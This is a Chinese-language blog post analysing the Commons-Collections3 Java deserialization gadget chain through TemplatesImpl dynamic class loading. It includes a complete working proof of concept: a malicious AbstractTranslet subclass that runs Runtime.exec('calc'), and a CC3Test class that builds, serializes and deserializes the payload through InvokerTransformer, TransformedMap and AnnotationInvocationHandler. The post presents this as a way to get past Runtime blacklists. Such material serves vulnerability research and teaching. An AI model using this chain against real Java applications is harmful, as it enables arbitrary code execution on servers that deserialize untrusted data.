Commons-Collections3
2022-03-14 14:04:00 # Java

Commons-Collections3

前言

CC1和CC6都是用Runtime.exec()命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码,动态类加载可以看之前发的文章: Java动态类加载

漏洞分析

使用动态类加载来执行代码,就需要用到defineClass类来处理字节码,将其处理为真正的Java类。但由于ClassLoader类里的defineClass都是protected属性,所以需要找到重写defineClass类,且为public属性的地方。

1647240888733.png

这里没有注明属性,所以默认为default类型,那么只能在他的这个包底下才能访问。

1647240888733.png

然后接下来看看哪里调用了这里的defineClass

1647243306255.png

这里TemplatesImpl类的defineTransletClass方法调用了,但是它是private属性,继续查找谁调用了这里的defineTransletClass方法

1647243417520.png

这里找到了getTransletInstance()方法,这个方法有一个初始化的操作,所以只要走完这个函数,就能动态执行我们的代码了,这个方法同样是私有的,所以我们继续向上查找

1647250168570.png

在同一个类下,找到了newTransformer()方法调用了getTransletInstance()方法1647264817034.png

只要调用了newTransformer()方法就会调用getTransletInstance()方法,然后就会触发_class[_transletIndex]类的对象初始化

1647265243514.png

而这个类的赋值是在上面if语句里的defineTransletClass()方法里进行的,这里对_class[i]进行类加载

1647265333301.png

这里新建一个CC3Test,看一下能否执行代码,看一下TemplatesImpl类。

1647265635447.png

这里继承了两个接口,分别是Templates和Serializable,有了Serializable接口,也就能序列化了。

我们跟进到getTransletInstance()函数里,这里的_name需要赋值,否正会返回null

1647266070738.png

跟进到构造函数里,发现调用的无参构造啥也没干,所以我们需要给_name赋值,其次如果_class为空的话,会调用defineTransletClasses(),这正是我们希望调用的,所以_class不能赋值,接着我们跟进一下defineTransletClasses()

1647266467722.png

这里如果_bytecodes为空的话,就会抛出异常了,所以_bytecodes也需要赋值。然后下面需要调用_tfactorygetExternalExtensionsMap()方法,所以_tfactory也需要赋值

1647267418739.png

接下来就差_tfactory的赋值了,我们跟进后发现这是一个transient修饰的变量,是不可被序列化的,所以现在需要看readobject

1647267470056.png

1647267606596.png

可以看到readObject里面是对_tfactory赋值了的,所以我们这里同样传入一个new TransformerFactoryImpl()

1
2
3
Field tfactoryField = tc.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());

然后尝试运行一下,发现报了一个空指针的错误。

1647271342299.png

查看defineTransletClasses(),下断点调试一下

1647269866431.png

最后发现这里的_auxClasses是空的,原因是因为对这个传入的恶意字节码的父类名是不是ABSTRACT_TRANSLET,如果不是的话,就会调用_auxClasses的put方法

1647271481418.png

所以能想到的解决方法:

  1. 让这个类的父类名为ABSTRACT_TRANSLET
  2. _auxClasses赋一个值

但是下面_transletIndex < 0的话,就抛出异常跳出去了,而此时的_transletIndex正是-1,所以只能采取第一种方法,让恶意类继承这个com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet

1647271910048.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
package ClassLoader;

import java.lang.reflect.Method;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Hacker extends AbstractTranslet{
public Hacker() throws Exception {
Class runtime = Class.forName("java.lang.Runtime");
Method exec = runtime.getMethod("exec", String.class);
Method getruntime = runtime.getMethod("getRuntime");
Object r = getruntime.invoke(runtime);
exec.invoke(r,"calc");
System.out.println("Hacker!!!");
}

public static void main(String[] args) {}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}
}

1647272088758.png

所以只要调用了TemplatesImpl#newTransformer(),就可以执行任意代码。因为这个用到了newTransformer(),所以可以直接用到CC1的InvokerTransformer()来调用newTransformer()

1
2
3
4
5
6
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer",null,null)
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

1647272378375.png

成功执行代码,其实相比CC1来说,只改了后半部分执行命令的方式。CC1是利用InvokerTransformer()调用Runtime#exec(),而CC3是利用InvokerTransformer()调用newTransformer(),实现动态类加载,执行我们传入的恶意类的代码。所以直接照搬后半部分就可以了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
package CC.CC3;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3Test {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class tc = templates.getClass();
Field nameField = tc.getDeclaredField("_name");//给_name变量赋值
nameField.setAccessible(true);
nameField.set(templates,"aaaa");
Field bytecodesField = tc.getDeclaredField("_bytecodes");//给_bytecodes赋值
bytecodesField.setAccessible(true);

byte[] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA 2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
byte[][] codes = {code}; //正常defineClass是传入一个一维数组,这里会进入for循环进行一个循环调用来进行defineClass类加载,我们只需要一个就行
bytecodesField.set(templates,codes);//这里是传入一个二维数组

Field tfactoryField = tc.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());

Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer",null,null)
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
map.put("value","aaa");
Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);


Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
annotationInvocationhdlConstructor.setAccessible(true);
Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedMap);
serialize(o);
unserialize("ser.bin");

}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}

1647272538346.png

成功执行代码,所以当过滤了Runtime类的时候,可以使用CC3来绕过黑名单。下面是流程示意图!

1647272759464.png